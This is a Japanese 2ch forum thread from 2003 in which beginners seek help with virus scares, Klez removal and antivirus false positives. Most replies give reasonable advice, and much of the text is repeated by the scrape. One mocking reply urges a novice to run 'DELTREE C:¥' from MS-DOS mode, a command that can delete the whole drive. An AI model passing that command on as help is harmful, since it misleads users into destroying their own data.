cgi.io-websight.com/index2/uploader/img/hare2284.jpg
というのをクリックしたところ、
「ウイルスをダウンロードします」
「hack.exeをダウンロードします」
「危険ですので、電源を切らないでください」
と表示されて、ダウンロード終了後、
ドクロの上に「THE END」とかかれた画像が出てきたのですが、
ネットで調べて見ても良く解からず、
ネット上でウイルススキャンしてもウイルスは発見できず、自分のパソコンがウイルスに感染しているかどうかも解からない状態です。
何しろウイルス初体験ですので、どうすればいいのか解かりません。
どなたか、教えていただけないでしょうか?
ちなみに私の環境は、win98se,IE6.0,Norton Antivirus5.0
自分勝手な質問で申し訳ありませんが、よろしくお願いします
2CHの実況・スポーツ・MotoGp鈴鹿で、
cgi.io-websight.com/index2/uploader/img/hare2284.jpg
というのをクリックしたところ、
「ウイルスをダウンロードします」
「hack.exeをダウンロードします」
「危険ですので、電源を切らないでください」
と表示されて、ダウンロード終了後、
ドクロの上に「THE END」とかかれた画像が出てきたのですが、
ネットで調べて見ても良く解からず、
ネット上でウイルススキャンしてもウイルスは発見できず、自分のパソコンがウイルスに感染しているかどうかも解からない状態です。
何しろウイルス初体験ですので、どうすればいいのか解かりません。
どなたか、教えていただけないでしょうか?
ちなみに私の環境は、win98se,IE6.0,Norton Antivirus5.0
自分勝手な質問で申し訳ありませんが、よろしくお願いします
728 :名無しさん@お腹いっぱい。:03/04/07 13:47
729 :名無しさん@お腹いっぱい。:03/04/07 13:58
728さん、どうもありがとうございました。
「THE END」と出た瞬間、目の前が真っ暗になりました。
おっしゃる通り、これからは気をつけます。
ありがとうございました。
「THE END」と出た瞬間、目の前が真っ暗になりました。
おっしゃる通り、これからは気をつけます。
ありがとうございました。
730 :名無しさん@お腹いっぱい。:03/04/07 14:15
>>729.
ジョークでよかったね。中には本当にいたずらするのもあるので、
これから注意して楽しいネットライフを送ろう。
たぶん、2000年の暮れにはやったやつだと思う。
似たようなので、「ハッキングされています」とか、
「個人情報を編集しています」が出て「完了しました。転送します」とかもある。
この手のものは慣れるか近寄らないかくらいしか対策のしようが無いからねぇw
ジョークでよかったね。中には本当にいたずらするのもあるので、
これから注意して楽しいネットライフを送ろう。
たぶん、2000年の暮れにはやったやつだと思う。
似たようなので、「ハッキングされています」とか、
「個人情報を編集しています」が出て「完了しました。転送します」とかもある。
この手のものは慣れるか近寄らないかくらいしか対策のしようが無いからねぇw
731 :名無しさん@お腹いっぱい。:03/04/07 14:25
>>730
本当に良かったです。
今まで「自分は大丈夫だろう」なんて思ってたけど、
今回の事でセキュリティーの重要性に気づかされました。
これからはむやみやたらと開かないよう、注意したいと思います。
どうもお騒がせしました。
それでは。
本当に良かったです。
今まで「自分は大丈夫だろう」なんて思ってたけど、
今回の事でセキュリティーの重要性に気づかされました。
これからはむやみやたらと開かないよう、注意したいと思います。
どうもお騒がせしました。
それでは。
732 :名無しさん@お腹いっぱい。:03/04/07 16:29
ゾーンアラームを入れているんですが、PC立ち上げるたびに、
svchost.exeっていうのがサーバーとして動こうとします。
これはなんだろ?と思って調べたんですが、
トロイの木馬に感染すると同じ名前のファイルが作られるそうで・・。
けど、svchost.exe自体は有効なファイルだからこれがあるからといって
必ず感染してるわけではないとも書かれていました。
で、どうやって見分ければいいのかわからないでの、教えてください。
普通にオンラインのウィルススキャンして引っかからなければ、
問題ないでしょうか?
svchost.exeっていうのがサーバーとして動こうとします。
これはなんだろ?と思って調べたんですが、
トロイの木馬に感染すると同じ名前のファイルが作られるそうで・・。
けど、svchost.exe自体は有効なファイルだからこれがあるからといって
必ず感染してるわけではないとも書かれていました。
で、どうやって見分ければいいのかわからないでの、教えてください。
普通にオンラインのウィルススキャンして引っかからなければ、
問題ないでしょうか?
733 :名無しさん@お腹いっぱい。:03/04/07 18:22
>>732
アンチウィルスソフト入れてないのか?
アンチウィルスソフト入れてないのか?
734 :名無しさん@お腹いっぱい。:03/04/07 21:40
735 :名無しさん@お腹いっぱい。:03/04/08 07:39
質問です。既出でしたらスイマセン。
先日、クレズらしきウィルスに感染したのですが
ノートン アンチウィルスでスキャンしても検出されませんでした。
感染していなければいいのですが、差出人を偽ってアドレス帳に
登録してあるアドレスに勝手に送信するウィルスってクルズですよね?
しかしスキャンした結果、VBS.LoveLetter.Aに感染していました。
これが、メールを勝手に送っているのでしょうか?
それとも、クルズはアンチウィルスでスキャンしても
検出されないのでしょうか?
教えて君で誠に申し訳ありませんが、アドバイスをお願い致します。
先日、クレズらしきウィルスに感染したのですが
ノートン アンチウィルスでスキャンしても検出されませんでした。
感染していなければいいのですが、差出人を偽ってアドレス帳に
登録してあるアドレスに勝手に送信するウィルスってクルズですよね?
しかしスキャンした結果、VBS.LoveLetter.Aに感染していました。
これが、メールを勝手に送っているのでしょうか?
それとも、クルズはアンチウィルスでスキャンしても
検出されないのでしょうか?
教えて君で誠に申し訳ありませんが、アドバイスをお願い致します。
736 :名無しさん@お腹いっぱい。:03/04/08 07:47
VBS_MERASH.A に感染してしまい
オンラインスキャンしてそのファイルを削除したんですが
それだけで大丈夫でしょうか?
オンラインスキャンしてそのファイルを削除したんですが
それだけで大丈夫でしょうか?
737 :名無しさん@お腹いっぱい。:03/04/08 08:06
質問するときは、OS、メーラ、検出したアンチウィルスソフトなど環境を
詳しく書くこと。ここの住人は超能力者ではありません。
検出したウィルス名が分かる場合、まずその検出したアンチウィルスソフトの
メーカーのウィルス辞典等で情報を調べるのが基本です。
ウィルスかどうかはウィルススキャンして判断してください。
挙動・メールの件名・添付ファイル名だけではウィルスかどうか確実に判断できません。
詳しく書くこと。ここの住人は超能力者ではありません。
検出したウィルス名が分かる場合、まずその検出したアンチウィルスソフトの
メーカーのウィルス辞典等で情報を調べるのが基本です。
ウィルスかどうかはウィルススキャンして判断してください。
挙動・メールの件名・添付ファイル名だけではウィルスかどうか確実に判断できません。
738 :名無しさん@お腹いっぱい。:03/04/08 08:07
>>735-736
いずれも過去ログに何度も出ているので、そこのリンク先参照。
いずれも過去ログに何度も出ているので、そこのリンク先参照。
>>738
シマンテックからW32.Klez駆除ツールを落として
実行しました。
その結果、
Neither W32.Klez.gen@mm nor W32.ElKern.gen
were found on your computer.と出ました。
これは駆除が成功したと考えてよろしいのでしょうか?
そのあと、アンチウィルスも再インストールしました。
分かる方、アドバイスお願いします。
シマンテックからW32.Klez駆除ツールを落として
実行しました。
その結果、
Neither W32.Klez.gen@mm nor W32.ElKern.gen
were found on your computer.と出ました。
これは駆除が成功したと考えてよろしいのでしょうか?
そのあと、アンチウィルスも再インストールしました。
分かる方、アドバイスお願いします。
740 :名無しさん@お腹いっぱい。:03/04/08 11:02
>>739
シマンテックのサイト見ればわかることをきくなよ。
誰かに大丈夫と言ってもらいたい気持ちは分かるが…
>LiveUpdateを実行し、ウイルス定義を最新版に更新し、コンピュータの
>スキャンを再度実行します。NAV で修復できないファイルは削除してください。
http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.removal.tool.html
シマンテックのサイト見ればわかることをきくなよ。
誰かに大丈夫と言ってもらいたい気持ちは分かるが…
>LiveUpdateを実行し、ウイルス定義を最新版に更新し、コンピュータの
>スキャンを再度実行します。NAV で修復できないファイルは削除してください。
http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.removal.tool.html
741 :名無しさん@お腹いっぱい。:03/04/08 11:53
スイマセン。心配性なもので。
ツールで駆除するまえに、アンチウィルスで試みたのですが
違うウィルスが発見され、クルズが発見されなかったので
本当に駆除出来たのか心配なんです。
LiveUpdateを実行して、ウイルス定義を最新版に更新し、
コンピュータの スキャンを再度実行したのですが
ウィルスが発見されなかったので、大丈夫だと
判断します。
色々ありがとうございました。
ツールで駆除するまえに、アンチウィルスで試みたのですが
違うウィルスが発見され、クルズが発見されなかったので
本当に駆除出来たのか心配なんです。
LiveUpdateを実行して、ウイルス定義を最新版に更新し、
コンピュータの スキャンを再度実行したのですが
ウィルスが発見されなかったので、大丈夫だと
判断します。
色々ありがとうございました。
742 :名無しさん@お腹いっぱい。:03/04/08 17:58
age
743 :教えてください:03/04/08 18:08
既出でしたらすいません。とるものもとりあえずご質問します。
オンラインスキャンで、TROJ_VB.Hというウィルスが発見されました。
トレンドマイクロのウィルスデータにも載っておらず、対応にこまっており
ます。削除すればすめば良いのですが、どうか教えてください。
お願いいたします。
オンラインスキャンで、TROJ_VB.Hというウィルスが発見されました。
トレンドマイクロのウィルスデータにも載っておらず、対応にこまっており
ます。削除すればすめば良いのですが、どうか教えてください。
お願いいたします。
744 :教えてください:03/04/08 18:27
追伸です。
今、削除しようとしましたら、現在使用中のためアクセスできないとなり、
削除できません。どうすればよいでしょうか?
今、削除しようとしましたら、現在使用中のためアクセスできないとなり、
削除できません。どうすればよいでしょうか?
745 :名無しさん@お腹いっぱい。:03/04/08 18:33
746 :名無しさん@お腹いっぱい。:03/04/08 18:34
ほんとにOS書かないで質問するヤシ多いな。嫌がらせか?
747 :bloom:03/04/08 18:35
748 :教えてください:03/04/08 19:20
すいませんでした。
ウィンドウズ98です。よろしくお願いいたします。
本当に困っております。
ウィンドウズ98です。よろしくお願いいたします。
本当に困っております。
749 :教えてください:03/04/08 19:22
それと、メーラーはIEです。トレンドマイクロのオンラインスキャンで
判明しました。お願いします。
判明しました。お願いします。
750 :名無しさん@お腹いっぱい。:03/04/08 19:28
>>743-744
( ´,_ゝ`)プッ MS−DOSモードで起動
C:¥>DELTREE C:¥(ここは消したいキーを)
削除しますか(Y/N)? で Y
まっ、[ctrl]+[alt]+[del]で使用中のプロセスを終了させてから削除でもいいけどな。
( ´,_ゝ`)プッ MS−DOSモードで起動
C:¥>DELTREE C:¥(ここは消したいキーを)
削除しますか(Y/N)? で Y
まっ、[ctrl]+[alt]+[del]で使用中のプロセスを終了させてから削除でもいいけどな。
751 :教えてください:03/04/08 19:38
>750
ご教示ありがとうございます。
情けないことですが、そのMS-DOSモードで起動するとはどういうこと
でしょうか。教えてください。
ご教示ありがとうございます。
情けないことですが、そのMS-DOSモードで起動するとはどういうこと
でしょうか。教えてください。
752 :名無しさん@お腹いっぱい。:03/04/08 19:54
753 :教えてください:03/04/08 19:59
>752さん
ありがとうございます。MS−DOSモードで再起動したあと、DELTREE
までは行き着くにはどうしたらよいですか?Yで消してその後、どうすれば
よいでしょうか。初心者ですのでお手数をおかけします。
どうか教えてください。よろしくお願いいたします。
ありがとうございます。MS−DOSモードで再起動したあと、DELTREE
までは行き着くにはどうしたらよいですか?Yで消してその後、どうすれば
よいでしょうか。初心者ですのでお手数をおかけします。
どうか教えてください。よろしくお願いいたします。
754 :名無しさん@お腹いっぱい。:03/04/08 20:15
755 :教えてください:03/04/08 20:26
>754さん
わかりました。そちらでやってみます。
ありがとうございました。
また報告に参ります。
わかりました。そちらでやってみます。
ありがとうございました。
また報告に参ります。
756 :教えてください:03/04/08 21:29
>754
その方法は不可能でした。プログラム使用中となっているというアラートが
でますが、ctrl+alt+delをしましても、そのプログラムは入ってません。
上の方法をおしえてください。お願いします。
その方法は不可能でした。プログラム使用中となっているというアラートが
でますが、ctrl+alt+delをしましても、そのプログラムは入ってません。
上の方法をおしえてください。お願いします。
757 :名無しさん@お腹いっぱい。:03/04/08 22:33
>>756
( ´,_ゝ`)プッ ほんとにちゃんとやったのか?
じゃぁ、起動時にF8キー何度か押してセーフモードで起動。
それで手動で削除できんか?
MS−DOSモードでの削除はcdコマンドでディレクトリー指定、
Dirコマンドで問題のプログラム検索、Delコマンド後エンターで削除。
出来るか?PC初心者板のほうがよかれ。
つーかネタに釣られちゃった・・・
( ´,_ゝ`)プッ ほんとにちゃんとやったのか?
じゃぁ、起動時にF8キー何度か押してセーフモードで起動。
それで手動で削除できんか?
MS−DOSモードでの削除はcdコマンドでディレクトリー指定、
Dirコマンドで問題のプログラム検索、Delコマンド後エンターで削除。
出来るか?PC初心者板のほうがよかれ。
つーかネタに釣られちゃった・・・
758 :名無しさん@お腹いっぱい。:03/04/08 22:41
age
759 :教えてください:03/04/08 22:49
ネタではありません。
その問題のウィルス「TROJ_VB.H」が入ってるというファイルが、C:\WINDOWS
\ShellNew\explorer.exeであるとなってます。
これって、エクスプローラのプログラムファイルなのでしょうか?
削除したら大変なことになるのでしょうか?
どうか、教えてくださいませ。お願いします。
その問題のウィルス「TROJ_VB.H」が入ってるというファイルが、C:\WINDOWS
\ShellNew\explorer.exeであるとなってます。
これって、エクスプローラのプログラムファイルなのでしょうか?
削除したら大変なことになるのでしょうか?
どうか、教えてくださいませ。お願いします。
760 :cheshire-cat ◆CATBCJABLA :03/04/08 22:50
761 :cheshire-cat ◆CATBCJABLA :03/04/08 22:53
762 :名無しさん@お腹いっぱい。:03/04/08 23:01
>>760
( ´,_ゝ`) そんな便利グッツあったのネ
( ´,_ゝ`) そんな便利グッツあったのネ
763 :名無しさん@お腹いっぱい。:03/04/08 23:05
764 :名無しさん@お腹いっぱい。:03/04/08 23:07
しかし、トレンドもウィルスデータベースにないトロイを検出すんなよ。
検出する以上はデータベースに載せとけよ。
検出する以上はデータベースに載せとけよ。
765 :cheshire-cat ◆CATBCJABLA :03/04/08 23:15
766 :教えてください:03/04/08 23:18
>760〜764さん
ありがとうございます。
763さんのおっしゃるように、いまからそのウィルススキャンやってみます。
また、報告にきます。みなさん、感謝します。
ありがとうございます。
763さんのおっしゃるように、いまからそのウィルススキャンやってみます。
また、報告にきます。みなさん、感謝します。
767 :名無しさん@お腹いっぱい。:03/04/08 23:19
( ´,_ゝ`) C:\WINDOWS \ShellNewにあるなら削除してよかれ。
( ・∀・)< こんなのみつけたっち♪
http://muryou.gasuki.com/moe/hankaku10.html
http://muryou.gasuki.com/moe/hankaku09.html
http://muryou.gasuki.com/moe/hankaku08.html
http://muryou.gasuki.com/moe/hankaku07.html
http://muryou.gasuki.com/moe/hankaku06.html
http://muryou.gasuki.com/moe/hankaku05.html
http://muryou.gasuki.com/moe/hankaku04.html
http://muryou.gasuki.com/moe/hankaku03.html
http://muryou.gasuki.com/moe/hankaku02.html
http://muryou.gasuki.com/moe/hankaku01.html
http://muryou.gasuki.com/moe/hankaku10.html
http://muryou.gasuki.com/moe/hankaku09.html
http://muryou.gasuki.com/moe/hankaku08.html
http://muryou.gasuki.com/moe/hankaku07.html
http://muryou.gasuki.com/moe/hankaku06.html
http://muryou.gasuki.com/moe/hankaku05.html
http://muryou.gasuki.com/moe/hankaku04.html
http://muryou.gasuki.com/moe/hankaku03.html
http://muryou.gasuki.com/moe/hankaku02.html
http://muryou.gasuki.com/moe/hankaku01.html
769 :名無しさん@お腹いっぱい。:03/04/08 23:22
( ´,_ゝ`) まぁただのショートカットかもしれんが・・
770 :教えてください:03/04/09 00:13
いま、763さんの教えてくださったウィルスキャンをやっている最中です。
まだ、時間がかかりそうです。お風呂に入ってきましたがまだまだって感じです。
767さんの、ゆうとおりかとも思いますが、せっかくですので、ここのウィル
スチェックをすましてから、またいろいろ教えていただきたいと思います。
今回の、感染はアニメサイトであそんでたら、notfind的なところに行って適当に
飛ばされてこのような仕儀になった物と思われます。メールの添付云々ではあり
ませんので非常に心外です。このような、くだらない仕掛けを作った人に怒りで
す。私自身の貴重な時間のみならず、このようなものにお教えをいただく方々の
貴重な時間をお取りしてしまい、まことに感謝の念に耐えません。
どうか、今後ともよろしくご教示の程、お願いいたします。
まだ、時間がかかりそうです。お風呂に入ってきましたがまだまだって感じです。
767さんの、ゆうとおりかとも思いますが、せっかくですので、ここのウィル
スチェックをすましてから、またいろいろ教えていただきたいと思います。
今回の、感染はアニメサイトであそんでたら、notfind的なところに行って適当に
飛ばされてこのような仕儀になった物と思われます。メールの添付云々ではあり
ませんので非常に心外です。このような、くだらない仕掛けを作った人に怒りで
す。私自身の貴重な時間のみならず、このようなものにお教えをいただく方々の
貴重な時間をお取りしてしまい、まことに感謝の念に耐えません。
どうか、今後ともよろしくご教示の程、お願いいたします。
771 :教えてください:03/04/09 01:06
763さんに教えていただいたsymantecのウィルススキャンでは、ウィルスは
検出されませんでした。ほっとしたと同時に、どうすればいいのかと戸惑います。
どうか、皆さん、これからもご教示お願いいたします。
このPCがだめになると、いろいろ大変なことになりますので、重ね重ね、おねがい
いたします。
検出されませんでした。ほっとしたと同時に、どうすればいいのかと戸惑います。
どうか、皆さん、これからもご教示お願いいたします。
このPCがだめになると、いろいろ大変なことになりますので、重ね重ね、おねがい
いたします。
772 :名無しさん@お腹いっぱい。:03/04/09 01:12
ウイルスに感染したみたいで、下のようなメッセージ勝手に送りまくって
PC起動するときlsass.exeエラーで強制シャットダウンされます・・・
なんていうウイルスでどうやって除去したらいいんでしょうか?
ウイルスバスターにも不正アクセスとしか出ないですしもうどうしたら・・
microsoft.com account auto-reply:
If you can keep your head when all about you
Are losing theirs and blaming it on you;
If you can trust yourself when all men doubt you,
But make allowance for their doubting too;
If you can wait and not be tired by waiting,
Or, being lied about,don't deal in lies,
Or, being hated, don't give way to hating,
And yet don't look too good, nor talk too wise;
... ... more look to the attachment.
PC起動するときlsass.exeエラーで強制シャットダウンされます・・・
なんていうウイルスでどうやって除去したらいいんでしょうか?
ウイルスバスターにも不正アクセスとしか出ないですしもうどうしたら・・
microsoft.com account auto-reply:
If you can keep your head when all about you
Are losing theirs and blaming it on you;
If you can trust yourself when all men doubt you,
But make allowance for their doubting too;
If you can wait and not be tired by waiting,
Or, being lied about,don't deal in lies,
Or, being hated, don't give way to hating,
And yet don't look too good, nor talk too wise;
... ... more look to the attachment.
773 :名無しさん@お腹いっぱい。:03/04/09 01:37
>>732を書き込んだものです。
環境をまったく書かないにも関わらず、即レスありがとうございます。
OSはXPproで、メーラーはEdmax、レジストリーキーはなんのことか解らないです・・・。
変な添付ファイルは開けていません。
アンチウィルスソフトは特に入れてなく、
定期的にトレンドマイクロのウイルスバスターオンラインスキャンでチェックしています。
環境をまったく書かないにも関わらず、即レスありがとうございます。
OSはXPproで、メーラーはEdmax、レジストリーキーはなんのことか解らないです・・・。
変な添付ファイルは開けていません。
アンチウィルスソフトは特に入れてなく、
定期的にトレンドマイクロのウイルスバスターオンラインスキャンでチェックしています。
http://www.saitama.gasuki.com/kaorin/
〜oノノハヽo〜
( ^▽^)/⌒\ , −-
((ニ[二=( こんなのがございま−−==≡≡す♪ ))
/∧=:|| \_/ `ー‐‐'
じ/___/
〜oノノハヽo〜
( ^▽^)/⌒\ , −-
((ニ[二=( こんなのがございま−−==≡≡す♪ ))
/∧=:|| \_/ `ー‐‐'
じ/___/
775 :名無しさん@お腹いっぱい。:03/04/09 02:09
souchost.exe
これ何?
これ何?
776 :名無しさん@お腹いっぱい。:03/04/09 10:32
age
777 :名無しさん@お腹いっぱい。:03/04/09 17:11
age
778 :教えてください:03/04/09 18:55
昨日はありがとうございました。symantecのウィルスチェックではウィルスは
でませんでしたが、相変わらずトレンドマイクロではTROJ_VB.Hというウィルス
がいて、削除できません。また、C\WINDOUS\shellNew\explorer.exeという
そのウィルスがいるといわれているファイルが、CドライブのWINDOUS
ディレクトリには、存在しません。今後どのように、対応すればよいのか教えて
下さい。みなさん、お願いいたします。
でませんでしたが、相変わらずトレンドマイクロではTROJ_VB.Hというウィルス
がいて、削除できません。また、C\WINDOUS\shellNew\explorer.exeという
そのウィルスがいるといわれているファイルが、CドライブのWINDOUS
ディレクトリには、存在しません。今後どのように、対応すればよいのか教えて
下さい。みなさん、お願いいたします。
779 :教えてください:03/04/09 21:50
はああ、どうすればいいのでしょうか?
困り果てております。
どなたか、お助けください。
困り果てております。
どなたか、お助けください。
780 :名無しさん@お腹いっぱい。:03/04/09 21:54
781 :名無しさん@お腹いっぱい。:03/04/09 22:02
>>778
トレンドの誤検出だろう。トロイ系に誤検出多い。
トレンドの誤検出だろう。トロイ系に誤検出多い。
783 :教えてください:03/04/09 22:37
>780さん,781さん、ありがとうございます。
再インストールも考えましたが、踏み切れません。もう少し頑張ってみます。
トレンドの誤検出だとすれば、ほんと、うれしいです。
symantecのウィルスチェックの方が正確ということでしょうか。だとすれば、
何もせずに無視していれば良いのですね。ご教示ありがとうございました。
初心者同然ですので、非常に弱気になってしまい仕事も手につきません。
さらにアドバイスなどありましたら、よろしくお願いいたします。
感謝!!
再インストールも考えましたが、踏み切れません。もう少し頑張ってみます。
トレンドの誤検出だとすれば、ほんと、うれしいです。
symantecのウィルスチェックの方が正確ということでしょうか。だとすれば、
何もせずに無視していれば良いのですね。ご教示ありがとうございました。
初心者同然ですので、非常に弱気になってしまい仕事も手につきません。
さらにアドバイスなどありましたら、よろしくお願いいたします。
感謝!!
784 :名無しさん@お腹いっぱい。:03/04/09 23:37
>>783
昨日シマンテックの方もやってみれ、といわれてたのは
誤検出の可能性があるから。
シマンテックの方が正確というわけではないが、トレンドマイクロの方は
トロイ系の誤検出が多いので有名。
今後はアンチウィルスソフトを常駐させて、定義を最新にしておくこと。
昨日シマンテックの方もやってみれ、といわれてたのは
誤検出の可能性があるから。
シマンテックの方が正確というわけではないが、トレンドマイクロの方は
トロイ系の誤検出が多いので有名。
今後はアンチウィルスソフトを常駐させて、定義を最新にしておくこと。
http://www.saitama.gasuki.com/kaorin/
こんなのございま−す♪
 ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
〜oノハヽo〜
,.-''"¨ ̄●`' ‐(^▽^)
(,,●i,,,i,,,,,,,,i,,,,●),,)⊂ )
) ( || |
( ^▽^) (_(__)
~~~~~  ̄ ̄ ~~~~~ ~~~~~
こんなのございま−す♪
 ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
〜oノハヽo〜
,.-''"¨ ̄●`' ‐(^▽^)
(,,●i,,,i,,,,,,,,i,,,,●),,)⊂ )
) ( || |
( ^▽^) (_(__)
~~~~~  ̄ ̄ ~~~~~ ~~~~~
786 :名無しさん@お腹いっぱい。:03/04/09 23:55
787 :名無しさん@お腹いっぱい。:03/04/10 00:06
788 :名無しさん@お腹いっぱい。:03/04/10 00:19
>>787
オンラインスキャンのサポートを求められても放置じゃあ?
>>783
再インストールを戸惑う間は初心者その物。
次からは下記を推奨。
パソコン初心者@2ch掲示板
http://pc2.2ch.net/pcqa/
コンピュータウィルス総合スレッド VOL.28
http://pc2.2ch.net/test/read.cgi/pcqa/1046237849/l50
オンラインスキャンのサポートを求められても放置じゃあ?
>>783
再インストールを戸惑う間は初心者その物。
次からは下記を推奨。
パソコン初心者@2ch掲示板
http://pc2.2ch.net/pcqa/
コンピュータウィルス総合スレッド VOL.28
http://pc2.2ch.net/test/read.cgi/pcqa/1046237849/l50
789 :教えてください:03/04/10 00:32
>784〜788さん
本当にありがとうございました。皆さんのような頼りがいのある、プロの
方々にいろいろアドバイスいただきましてまことに嬉しい限りです。
いささか気持悪さは残りますが、このトレンドの検出ウィルスは放置して
明日から業務にフル回転することにいたしました。今のところ目立ったおかしな
状況は有りませんので、今節は、今の状況で運用していこうと思います。
今後ともよろしくお願いいたします。
本当にありがとうございました。皆さんのような頼りがいのある、プロの
方々にいろいろアドバイスいただきましてまことに嬉しい限りです。
いささか気持悪さは残りますが、このトレンドの検出ウィルスは放置して
明日から業務にフル回転することにいたしました。今のところ目立ったおかしな
状況は有りませんので、今節は、今の状況で運用していこうと思います。
今後ともよろしくお願いいたします。
790 :黄金泉:03/04/10 08:30
what?
791 :名無しさん@お腹いっぱい。:03/04/10 11:04
どなたか、Xtremeというサイト?の接続ソフトの削除の仕方知らないですか?
ファイルやショートカットを削除しても、PC再起動させるとまた復活
してしまうんです。レジストリでしょうか?
PC重くてしょうがないんです。接続ぶちぶち切られるし・・・
ファイルやショートカットを削除しても、PC再起動させるとまた復活
してしまうんです。レジストリでしょうか?
PC重くてしょうがないんです。接続ぶちぶち切られるし・・・
792 :名無しさん@お腹いっぱい。:03/04/10 11:12
793 :名無しさん@お腹いっぱい。:03/04/10 11:13
794 :名無しさん@お腹いっぱい。:03/04/10 11:14
795 :名無しさん@お腹いっぱい。:03/04/10 20:05
age
796 :dennji:03/04/10 20:24
ウイルスを友達に送りたいので送り方教えてください
797 :名無しさん@お腹いっぱい。:03/04/10 20:27
>>796
板違い。板TOP参照。どっかうせろ。
板違い。板TOP参照。どっかうせろ。
798 :名無しさん@お腹いっぱい。:03/04/10 21:09
KLEZがやってきました。
ウイルススキャンで削除したはずなんですが出勤前で慌てておりまして・・・
本当に削除できているのか感染していないのか確認をしたいのですが
方法はありますでしょうか。
一応スキャンは掛けてみたのですが引っかかりませんでした。
が、しかし添付ファイルフォルダにはなにやら残っている様子。
これは自分の手でゴミ箱へ削除してしまっていいんでしょうか・・・
環境は窓ME IE6 ポスペにて受信です。
どなたかよろしくご教授ください。
ウイルススキャンで削除したはずなんですが出勤前で慌てておりまして・・・
本当に削除できているのか感染していないのか確認をしたいのですが
方法はありますでしょうか。
一応スキャンは掛けてみたのですが引っかかりませんでした。
が、しかし添付ファイルフォルダにはなにやら残っている様子。
これは自分の手でゴミ箱へ削除してしまっていいんでしょうか・・・
環境は窓ME IE6 ポスペにて受信です。
どなたかよろしくご教授ください。
799 :cheshire-cat ◆CATBCJABLA :03/04/10 21:10
800 :名無しさん@お腹いっぱい。:03/04/10 21:18
OS2000ですが、
DEVULS_DANCEウイルスを駆除したんです。
ですがHDD容量があまりに少ないので何かと思えば
TempフォルダのGLCファイルが膨大に膨れ上がって
数Gほど取られました。
これはウイルスが原因なんでしょうか?
DEVULS_DANCEウイルスを駆除したんです。
ですがHDD容量があまりに少ないので何かと思えば
TempフォルダのGLCファイルが膨大に膨れ上がって
数Gほど取られました。
これはウイルスが原因なんでしょうか?
801 :cheshire-cat ◆CATBCJABLA :03/04/10 21:42
>>800
Devil's Danceは10年以上前のウイルスなんすけど。
それとも違う奴なんでしょか。
tmpとかTempフォルダの中身ってのは、大体は消してしまっても問題無いんすけど。
んでもGCLってのが何なのか知らんので。
消すなら自己責任で、漏れを恨まないで下され。
Devil's Danceは10年以上前のウイルスなんすけど。
それとも違う奴なんでしょか。
tmpとかTempフォルダの中身ってのは、大体は消してしまっても問題無いんすけど。
んでもGCLってのが何なのか知らんので。
消すなら自己責任で、漏れを恨まないで下され。
802 :cheshire-cat ◆CATBCJABLA :03/04/10 21:51
803 :名無しさん@お腹いっぱい。:03/04/10 21:58
レスありがとうございます。
今の残りHDDが12Mとかって表示されてるので
ファイルごと消すしかなさそうですね。
消してだめでしたらOS再インストール実行してみます。
今の残りHDDが12Mとかって表示されてるので
ファイルごと消すしかなさそうですね。
消してだめでしたらOS再インストール実行してみます。
804 :cheshire-cat ◆CATBCJABLA :03/04/10 22:41
805 :名無しさん@お腹いっぱい。:03/04/10 22:50
( ´,_ゝ`)プッ どちらでもいいがTempなんぞ迷わずサッサと捨てろ
起動のたびに捨ててもいいくらいだ。
起動のたびに捨ててもいいくらいだ。
806 :798:03/04/10 22:55
>>799 cheshire-cat様
アドバイスどおりに添付ファイルをゴミ箱から削除し
再度ウイルススキャンとオンラインウイルス検索を二重にかけて
感染なしを確認いたしました。
ご教授ありがとうございました。
アドバイスどおりに添付ファイルをゴミ箱から削除し
再度ウイルススキャンとオンラインウイルス検索を二重にかけて
感染なしを確認いたしました。
ご教授ありがとうございました。
807 :名無しさん@お腹いっぱい。:03/04/11 00:11
http://www.geocities.jp/mmoussyy/
すいません、これってネタですよね?
このサイトに入ると、うろ覚えなんですが
ディスク削除中とか出ます・・・すぐ消しました。
しかし、次再起動するともう立ち上がらなくなるとか心配です。
すいません、これってネタですよね?
このサイトに入ると、うろ覚えなんですが
ディスク削除中とか出ます・・・すぐ消しました。
しかし、次再起動するともう立ち上がらなくなるとか心配です。
808 :名無しさん@お腹いっぱい。:03/04/11 00:15
809 :名無しさん@お腹いっぱい。:03/04/11 00:21
810 :名無しさん@お腹いっぱい。:03/04/11 02:34
>>807
ウィルスには直接関係ないので、スレ違いかもしれんが、
MicrosoftVMの脆弱性を悪用することで、Web訪問者のHDD初期化も可能だ。
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms03-011.asp
さっさと修正パッチ入れておこう(Windows UpdateでOK)。
パッチを当てないPCを狙ったウィルスが発生するのも時間の問題。
ウィルスには直接関係ないので、スレ違いかもしれんが、
MicrosoftVMの脆弱性を悪用することで、Web訪問者のHDD初期化も可能だ。
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms03-011.asp
さっさと修正パッチ入れておこう(Windows UpdateでOK)。
パッチを当てないPCを狙ったウィルスが発生するのも時間の問題。
811 :名無しさん@お腹いっぱい。:03/04/11 22:19
パソコン初心者なんで、ウィルスについては何も分らなくて・・・
Norton AntiVirusでスキャンをしたら、感染が一つ見付かりました。
VBS.Network.E というやつです。
削除すればいいのかな?と思い、削除をクリックしたら
「このシステムを永久に削除しますか?」と出ました。
本当に削除しちゃっていいのでしょうか??
感染場所は
C:\Documents and Settings\(自分の名前)\Local Settings\Temporary Internet Files\Content.IE5\HSSJ19O1
となっています。
Norton AntiVirusでスキャンをしたら、感染が一つ見付かりました。
VBS.Network.E というやつです。
削除すればいいのかな?と思い、削除をクリックしたら
「このシステムを永久に削除しますか?」と出ました。
本当に削除しちゃっていいのでしょうか??
感染場所は
C:\Documents and Settings\(自分の名前)\Local Settings\Temporary Internet Files\Content.IE5\HSSJ19O1
となっています。
812 :ぼるじょあ ◆yBEncckFOU :03/04/11 22:26
>>811
(・3・) エェー 削除していいYO
(・3・) エェー 削除していいYO
813 :cheshire-cat ◆CATBCJABLA :03/04/11 22:30
814 :811:03/04/11 22:39
815 :名無しさん@お腹いっぱい。:03/04/11 22:57
ウイルスのMelissa持ってる人、居ます?
816 :名無しさん@お腹いっぱい。:03/04/12 04:36
たつけてくり
